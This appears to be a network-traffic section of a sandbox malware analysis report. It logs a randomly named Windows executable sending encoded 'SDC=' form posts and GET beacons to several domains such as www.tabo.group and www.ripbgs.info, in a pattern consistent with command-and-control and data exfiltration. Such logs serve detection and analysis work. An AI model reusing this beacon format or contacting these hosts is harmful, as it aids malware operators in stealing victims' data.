59 64 4d 71 4b 33 6f 55 7a 64 69 4e 6f 35 62 5a 36 52 74 53 71 4c 78 78 72 69 35 65 67 49 61 4f 72 77 5a 6a 45 78 47 47 52 4f 58 45 44 73 39 61 4d 6e 5a 4c Data Ascii: SDC=kn3+GtwMl/9OUAB/0ZStaVOCW3d3fxSZ40aNvVOWCwkm/ZaJ/7Ye+GVNZvQ4UDPkgqvA6qMtc9Id4t/5K3wBWivJXftAWdgfppbAZ7IQA6T3zsVa8Tdml0wzzT7jzwN5l7n5Oj6rYdMqK3oUzdiNo5bZ6RtSqLxxri5egIaOrwZjExGGROXEDs9aMnZL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49978	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:13:41.577199936 CET	759	OUT	POST /danh/ HTTP/1.1 Host: www.tabo.group Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.tabo.group Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.tabo.group/danh/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 6b 6e 33 2b 47 74 77 4d 6c 2f 39 4f 58 67 78 2f 79 34 53 74 4b 46 4f 42 5a 58 64 33 52 52 54 51 34 30 65 4e 76 55 61 47 44 43 77 6d 2f 35 4b 4a 75 4b 59 65 39 47 56 4e 52 50 51 39 61 6a 50 6a 67 71 69 7a 36 71 41 74 63 39 4d 64 34 73 50 35 4b 41 45 43 45 69 76 48 62 2f 74 43 4c 74 67 66 70 70 62 41 5a 37 64 2f 41 36 4c 33 76 4d 6c 61 39 32 78 35 76 55 77 77 77 54 37 6a 6c 41 4e 39 6c 37 6e 66 4f 6e 37 6a 59 65 30 71 4b 33 34 55 7a 50 4b 53 6d 35 62 6c 33 78 74 47 71 72 5a 36 79 68 64 53 6d 71 47 69 38 77 63 66 48 51 37 42 41 66 32 54 51 62 68 55 43 68 73 68 53 6b 74 34 62 54 6d 54 52 49 51 43 4a 37 7a 63 50 6b 78 32 39 67 3d 3d Data Ascii: SDC=kn3+GtwMl/9OXgx/y4StKFOBZXd3RRTQ40eNvUaGDCwm/5KJuKYe9GVNRPQ9ajPjgqiz6qAtc9Md4sP5KAECEivHb/tCLtgfppbAZ7d/A6L3vMla92x5vUwwwT7jlAN9l7nfOn7jYe0qK34UzPKSm5bl3xtGqrZ6yhdSmqGi8wcfHQ7BAf2TQbhUChshSkt4bTmTRIQCJ7zcPkx29g==
Jan 10, 2025 18:13:42.045332909 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49979	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:13:44.125709057 CET	1772	OUT	POST /danh/ HTTP/1.1 Host: www.tabo.group Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.tabo.group Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.tabo.group/danh/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 6b 6e 33 2b 47 74 77 4d 6c 2f 39 4f 58 67 78 2f 79 34 53 74 4b 46 4f 42 5a 58 64 33 52 52 54 51 34 30 65 4e 76 55 61 47 44 43 49 6d 2f 4b 79 4a 2f 64 30 65 7a 6d 56 4e 62 76 51 38 61 6a 50 79 67 71 72 62 36 71 38 39 63 2f 6b 64 35 50 58 35 4d 79 73 43 4f 69 76 48 54 66 74 44 57 64 68 46 70 70 4c 45 5a 37 4e 2f 41 36 4c 33 76 50 39 61 30 44 64 35 67 30 77 7a 7a 54 37 52 7a 77 4e 46 6c 37 65 71 4f 6e 33 7a 5a 76 55 71 4e 54 6b 55 78 38 69 53 75 35 62 6a 6b 42 73 42 71 72 45 69 79 68 41 68 6d 72 7a 48 38 79 38 66 57 31 66 63 45 73 47 2b 46 37 31 57 62 51 77 77 61 55 74 6e 62 67 54 4f 47 5a 51 64 4c 66 7a 4d 50 77 67 4b 70 46 57 75 49 56 44 44 50 62 30 42 5a 55 61 59 45 69 4b 59 4d 4a 6b 55 57 64 39 54 45 31 36 38 6f 4a 4b 4b 58 65 69 73 44 45 47 4c 77 68 41 34 67 35 6c 68 4c 79 54 39 49 6b 6b 42 6e 4c 7a 4d 4c 6b 6c 34 56 5a 54 69 79 76 52 4d 51 31 4b 31 72 36 67 55 69 35 6b 4b 52 34 75 46 6e 4b 78 4f 6a 79 4d 6e 65 48 35 7a 70 2b 46 32 55 6e 54 67 5a 6b 53 36 4b 6e 36 56 61 66 39 43 6b 49 [TRUNCATED] Data Ascii: SDC=kn3+GtwMl/9OXgx/y4StKFOBZXd3RRTQ40eNvUaGDCIm/KyJ/d0ezmVNbvQ8ajPygqrb6q89c/kd5PX5MysCOivHTftDWdhFppLEZ7N/A6L3vP9a0Dd5g0wzzT7RzwNFl7eqOn3zZvUqNTkUx8iSu5bjkBsBqrEiyhAhmrzH8y8fW1fcEsG+F71WbQwwaUtnbgTOGZQdLfzMPwgKpFWuIVDDPb0BZUaYEiKYMJkUWd9TE168oJKKXeisDEGLwhA4g5lhLyT9IkkBnLzMLkl4VZTiyvRMQ1K1r6gUi5kKR4uFnKxOjyMneH5zp+F2UnTgZkS6Kn6Vaf9CkIfEJOUZbylwklS9woFM2lPaSJvgnLZMOh18tyQaTkjk6I6aFGkFlekZb9y1tsk6zCQXfMcO3ApTzfv4vyBTP8wdqx3W0cg0RYojpB+CIEkOjj9T6TW2CjsWFX2NZhge70dPqASd3kFnjKJzPcxzDWAKlzhLz2IkCUYr3X1q3BzNUi0gEVcVtYqrQPVjlfVkN3oz2Sn355pSzH0MmSxZFc1az7tfiOIfvHur8Bu+kC9PsB6xaRyzhOnJ7TvQSV+ybIk0gdk3kz6CgDG52gwdTuBbdgGMdIzsmZvoo3oYMneST6gS1gNW+IIBb/JHxtYPbuzAqXlKk/QRV1MP9pvGQVSrL0AkbvYKwd3AqR/3EijjIDmqOmjNRXzhhVVZgWYo05RnJSU81cP2JMUyXRWWE2Ov2k9jvZdDQyLZaJZs2Z9R3nuqhPIGJx2uPezUOJXI2Tzp+DLDjrq9IFfR8Xc6bCYw38AR0x7SU8A+wcgQcUFtnrHU6RadGb2wsjw+JI9+nY9pd6cPnUDsYF9kq/DL92aev+2naBMVC33N1nuQJndaIWRiXNgw+z0Jz4wn5J6K8fuV7UfyP/dsfE0cSZgT4+EGMN+xPLsrZyszoxwYGdTUR9/2ds2F0voEItxZx+J+mlX8gdUe87VKiKoPyJtwpF7WxrFIr5vJWjTs [TRUNCATED]
Jan 10, 2025 18:13:44.582614899 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49980	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:13:46.665102959 CET	474	OUT	GET /danh/?SDC=plfeFctMvM5qFTk9zYraEzuSV04Dajmg5T2jzUK/AFUa2umQn4AZ92ZqS+0pXSD/w+7u0pkwA/lc4M7GNy4MLzjoWeEcf8xh8tT7C8tCLIno1r1qjw==&mH=CpePy0P HTTP/1.1 Host: www.tabo.group Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:13:47.137406111 CET	367	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 17:13:47 GMT content-length: 246 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 44 43 3d 70 6c 66 65 46 63 74 4d 76 4d 35 71 46 54 6b 39 7a 59 72 61 45 7a 75 53 56 30 34 44 61 6a 6d 67 35 54 32 6a 7a 55 4b 2f 41 46 55 61 32 75 6d 51 6e 34 41 5a 39 32 5a 71 53 2b 30 70 58 53 44 2f 77 2b 37 75 30 70 6b 77 41 2f 6c 63 34 4d 37 47 4e 79 34 4d 4c 7a 6a 6f 57 65 45 63 66 38 78 68 38 74 54 37 43 38 74 43 4c 49 6e 6f 31 72 31 71 6a 77 3d 3d 26 6d 48 3d 43 70 65 50 79 30 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?SDC=plfeFctMvM5qFTk9zYraEzuSV04Dajmg5T2jzUK/AFUa2umQn4AZ92ZqS+0pXSD/w+7u0pkwA/lc4M7GNy4MLzjoWeEcf8xh8tT7C8tCLIno1r1qjw==&mH=CpePy0P"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49981	47.83.1.90	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:13:52.191030979 CET	738	OUT	POST /mheu/ HTTP/1.1 Host: www.ripbgs.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.ripbgs.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.ripbgs.info/mheu/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 77 4e 32 66 64 48 7a 41 63 44 4c 4f 64 30 62 61 59 4d 4e 34 4a 73 34 6a 39 34 76 2f 49 61 52 4f 51 35 41 5a 33 34 42 33 46 5a 54 75 64 76 48 75 46 71 76 6c 39 4d 55 53 65 78 32 6e 6f 4f 31 56 56 69 32 7a 56 4e 38 6f 2f 72 52 37 78 5a 51 37 4c 51 72 4f 4a 55 41 6e 41 5a 71 61 66 68 72 2b 6f 7a 71 61 77 76 67 33 4c 61 46 2f 45 33 49 50 79 37 75 47 72 37 33 36 53 44 73 53 58 34 4f 73 7a 53 4c 49 48 34 4c 68 68 65 2f 57 36 2f 48 74 75 32 36 69 70 41 75 50 64 59 4a 69 52 33 6e 77 31 76 49 45 4c 78 64 41 4c 5a 7a 48 65 53 42 6e 46 63 62 58 6e 55 48 43 32 4c 47 68 Data Ascii: SDC=wN2fdHzAcDLOd0baYMN4Js4j94v/IaROQ5AZ34B3FZTudvHuFqvl9MUSex2noO1VVi2zVN8o/rR7xZQ7LQrOJUAnAZqafhr+ozqawvg3LaF/E3IPy7uGr736SDsSX4OszSLIH4Lhhe/W6/Htu26ipAuPdYJiR3nw1vIELxdALZzHeSBnFcbXnUHC2LGh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49982	47.83.1.90	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:13:54.733218908 CET	762	OUT	POST /mheu/ HTTP/1.1 Host: www.ripbgs.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.ripbgs.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.ripbgs.info/mheu/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 77 4e 32 66 64 48 7a 41 63 44 4c 4f 63 55 4c 61 61 76 6c 34 59 63 34 73 6b 59 76 2f 47 36 52 4b 51 34 38 5a 33 39 6c 65 47 72 48 75 63 4b 37 75 4c 4f 44 6c 75 38 55 53 51 52 32 69 31 2b 31 4f 56 69 36 52 56 50 34 6f 2f 72 46 37 78 59 67 37 4c 6a 7a 4a 4c 45 41 6c 4a 35 71 59 43 78 72 2b 6f 7a 71 61 77 72 77 4a 4c 65 70 2f 45 6e 34 50 7a 65 61 42 6f 37 33 35 56 44 73 53 64 6f 4f 6f 7a 53 4c 75 48 35 48 50 68 64 48 57 36 36 6a 74 75 69 75 68 67 41 75 4e 58 34 4a 77 43 33 4b 6c 2f 2f 45 46 4f 77 45 4c 55 71 37 58 51 54 38 67 55 4e 36 41 30 6a 62 4d 34 4e 7a 4c 58 65 78 32 34 2b 79 2f 2f 30 32 48 67 63 52 34 74 58 66 4f 33 41 3d 3d Data Ascii: SDC=wN2fdHzAcDLOcULaavl4Yc4skYv/G6RKQ48Z39leGrHucK7uLODlu8USQR2i1+1OVi6RVP4o/rF7xYg7LjzJLEAlJ5qYCxr+ozqawrwJLep/En4PzeaBo735VDsSdoOozSLuH5HPhdHW66jtuiuhgAuNX4JwC3Kl//EFOwELUq7XQT8gUN6A0jbM4NzLXex24+y//02HgcR4tXfO3A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49983	47.83.1.90	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:13:57.280318975 CET	1775	OUT	POST /mheu/ HTTP/1.1 Host: www.ripbgs.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.ripbgs.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.ripbgs.info/mheu/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 77 4e 32 66 64 48 7a 41 63 44 4c 4f 63 55 4c 61 61 76 6c 34 59 63 34 73 6b 59 76 2f 47 36 52 4b 51 34 38 5a 33 39 6c 65 47 71 2f 75 63 34 44 75 45 50 44 6c 74 38 55 53 4f 42 32 6a 31 2b 30 63 56 69 79 56 56 50 31 58 2f 6f 39 37 79 36 34 37 4e 57 48 4a 43 45 41 6c 57 70 71 5a 66 68 71 6b 6f 7a 36 65 77 76 73 4a 4c 65 70 2f 45 6c 67 50 30 4c 75 42 6b 62 33 36 53 44 73 47 58 34 50 2f 7a 57 6d 56 48 35 44 78 68 74 6e 57 36 61 54 74 74 55 53 68 76 41 75 44 55 34 49 6a 43 33 48 31 2f 2b 70 38 4f 77 68 75 55 71 54 58 55 48 64 46 41 74 4f 68 75 6a 4c 75 30 2b 66 69 62 71 68 32 67 64 36 39 39 46 6d 34 6a 2b 4e 70 35 45 6d 2f 74 55 76 35 4c 6a 35 61 58 63 69 52 71 36 4c 7a 36 72 6f 51 71 6a 56 71 72 61 2f 68 4f 42 31 4c 67 57 41 59 6a 74 54 2b 6b 51 36 31 66 53 57 4c 6d 5a 4f 51 71 33 79 4d 75 67 77 63 59 56 39 79 39 77 39 66 78 2b 6d 38 49 32 43 4e 35 42 73 76 33 7a 52 4f 75 6b 54 37 65 42 4e 6c 46 78 6b 43 66 56 55 69 75 4c 75 4c 6d 68 47 6a 78 50 34 57 56 32 48 57 4e 47 71 4a 31 76 56 31 51 63 [TRUNCATED] Data Ascii: SDC=wN2fdHzAcDLOcULaavl4Yc4skYv/G6RKQ48Z39leGq/uc4DuEPDlt8USOB2j1+0cViyVVP1X/o97y647NWHJCEAlWpqZfhqkoz6ewvsJLep/ElgP0LuBkb36SDsGX4P/zWmVH5DxhtnW6aTttUShvAuDU4IjC3H1/+p8OwhuUqTXUHdFAtOhujLu0+fibqh2gd699Fm4j+Np5Em/tUv5Lj5aXciRq6Lz6roQqjVqra/hOB1LgWAYjtT+kQ61fSWLmZOQq3yMugwcYV9y9w9fx+m8I2CN5Bsv3zROukT7eBNlFxkCfVUiuLuLmhGjxP4WV2HWNGqJ1vV1QcytHdIh1a3NBtXRfl5EZUHlpsDEiJgPk3uTpHR96wdiPOT5AoHoxK9pksdFo6OsqHd9WDaUU7YQG1/UoxljAGE7PjjaKu3YwG7igfdxbyzCfy0pZhYvVq/SFPwLWT+w0tLfXotOhD2LZS5EFzeFRhKdFZkwHnQDgZ3395QfvAyqLbXxKblieFDg3FgyQsaDURVfmnpIPqQWO6olQsQpIk+bGQ3Lt87nZPT89nyI1BHkMJLZLmRqgSiI9LorzfpUhfVv5SjpCv/jhUFGd7V0Xr4x27+bcIBuHuosMUtcPlAosAN8e2HZuHniV6Q+dRzLcwaPRqdMNbGg+cjN3lJuoOPlt99r6fjtJzOvZ6DQkf2GJqJbgK8BFT5XdTLxcHHmqC7gNeT39+FZNcLA7jkIsy98jOYessspNLCbwUuxlT9NrfJ13a/fUOTTBClHVG/q+y+TSyVGFfi30lFaL3w5aOPapmh0zNxc+JmHS063bdktX0MnjrqCHD7oXu8wHRYKGyOCO168WGB5GqQwyvvm9YEEGkKVxsfJ0f/+tXWxPuEKytZiHLlTtgbGB/M1lJzD+9j/KPNfFylN3D0HgTSrNsba9uUc4MH9JZ7zgiZIhLxwUMB3nL1IOSdCTLMwhDLXrRDF1plLDz/YCCxNtt4hB61+jhqeQ1hjDr2K [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49984	47.83.1.90	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:13:59.820938110 CET	475	OUT	GET /mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P HTTP/1.1 Host: www.ripbgs.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:14:01.552908897 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 17:14:01 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49985	103.106.67.112	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:06.793493986 CET	741	OUT	POST /3q0n/ HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.furrcali.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.furrcali.xyz/3q0n/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 65 68 42 4f 69 58 42 4d 59 72 6c 47 33 6c 6c 51 72 4b 78 36 53 62 58 4d 6c 46 78 73 4d 34 4e 5a 6a 69 64 65 72 33 5a 33 42 4d 39 4d 2b 2f 69 63 4f 54 58 67 34 64 7a 57 6c 31 57 76 36 33 5a 6a 2b 6f 57 58 35 48 4f 69 4a 48 49 58 72 43 39 51 72 2b 65 59 56 4f 4c 7a 4b 71 45 6c 6e 55 39 75 70 6e 52 37 61 67 6d 6a 43 7a 54 76 31 32 48 52 42 59 51 39 55 32 36 63 67 54 43 37 71 31 6d 6a 45 2b 36 49 66 51 71 57 6d 74 4a 6e 4c 58 73 53 72 2b 71 6f 41 46 67 33 6b 73 6f 6b 64 77 65 69 53 31 37 58 61 39 38 6f 43 44 79 4f 2b 64 70 6e 73 6c 4f 66 46 52 46 77 38 53 61 76 Data Ascii: SDC=ehBOiXBMYrlG3llQrKx6SbXMlFxsM4NZjider3Z3BM9M+/icOTXg4dzWl1Wv63Zj+oWX5HOiJHIXrC9Qr+eYVOLzKqElnU9upnR7agmjCzTv12HRBYQ9U26cgTC7q1mjE+6IfQqWmtJnLXsSr+qoAFg3ksokdweiS17Xa98oCDyO+dpnslOfFRFw8Sav
Jan 10, 2025 18:14:07.447912931 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/3q0n/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Fri, 10 Jan 2025 17:14:07 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49986	103.106.67.112	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:09.396476030 CET	765	OUT	POST /3q0n/ HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.furrcali.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.furrcali.xyz/3q0n/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 65 68 42 4f 69 58 42 4d 59 72 6c 47 31 46 56 51 6f 74 6c 36 61 62 58 50 70 6c 78 73 58 49 4e 64 6a 69 42 65 72 32 74 6e 43 2b 70 4d 77 39 71 63 50 53 58 67 37 64 7a 57 74 56 57 71 2b 33 5a 6f 2b 6f 4b 31 35 47 79 69 4a 48 63 58 72 48 5a 51 72 74 47 66 58 65 4c 78 65 61 46 44 6a 55 39 75 70 6e 52 37 61 67 43 4a 43 7a 4c 76 31 6d 58 52 43 38 45 36 63 57 36 62 32 6a 43 37 35 6c 6d 64 45 2b 36 2b 66 55 71 34 6d 76 78 6e 4c 54 6f 53 71 72 65 72 61 56 67 31 67 73 70 55 54 69 7a 4a 55 33 65 75 56 4c 67 48 57 7a 57 30 35 38 55 67 39 30 76 49 57 6d 5a 2b 79 55 76 46 6c 65 33 76 39 50 43 7a 6c 6d 34 37 39 37 6f 79 30 63 61 79 35 67 3d 3d Data Ascii: SDC=ehBOiXBMYrlG1FVQotl6abXPplxsXINdjiBer2tnC+pMw9qcPSXg7dzWtVWq+3Zo+oK15GyiJHcXrHZQrtGfXeLxeaFDjU9upnR7agCJCzLv1mXRC8E6cW6b2jC75lmdE+6+fUq4mvxnLToSqreraVg1gspUTizJU3euVLgHWzW058Ug90vIWmZ+yUvFle3v9PCzlm4797oy0cay5g==
Jan 10, 2025 18:14:10.100686073 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/3q0n/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Fri, 10 Jan 2025 17:14:09 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49987	103.106.67.112	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:14:11.939126015 CET	1778	OUT	POST /3q0n/ HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.furrcali.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1228 Connection: close Referer: http://www.furrcali.xyz/3q0n/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 65 68 42 4f 69 58 42 4d 59 72 6c 47 31 46 56 51 6f 74 6c 36 61 62 58 50 70 6c 78 73 58 49 4e 64 6a 69 42 65 72 32 74 6e 43 2b 78 4d 77 49 6d 63 4a 78 2f 67 36 64 7a 57 6a 31 57 72 2b 33 5a 50 2b 6f 53 78 35 47 2b 55 4a 42 59 58 71 6b 68 51 36 73 47 66 65 65 4c 78 63 61 46 58 6e 55 39 33 70 6a 31 33 61 67 79 4a 43 7a 4c 76 31 67 54 52 55 59 51 36 65 57 36 63 67 54 43 4a 71 31 6d 6d 45 36 65 75 66 55 6d 47 6d 62 4e 6e 4b 33 4d 53 70 5a 47 72 43 46 67 7a 73 4d 70 4d 54 69 2f 57 55 33 44 52 56 4c 39 67 57 78 32 30 36 5a 30 37 6b 67 65 52 55 48 35 35 37 55 2f 4a 70 59 6e 33 78 4e 33 75 70 54 34 69 6f 4c 6c 44 39 59 48 6e 37 41 6b 68 69 4a 6d 2f 36 43 57 52 46 73 56 32 73 71 2f 35 2b 34 6c 4a 34 72 6d 63 2f 51 53 4c 6b 65 53 65 53 6a 41 30 66 7a 6a 42 73 64 4b 39 4a 30 71 56 6f 50 57 48 70 76 64 61 39 38 7a 4e 75 62 66 6e 59 46 71 61 47 76 74 67 64 47 63 77 34 74 44 43 45 37 62 34 54 70 43 6b 4d 2b 77 47 4d 54 58 6b 30 2f 4f 38 6c 55 35 36 38 59 36 52 79 38 63 5a 56 59 38 6f 42 46 53 44 43 46 [TRUNCATED] Data Ascii: 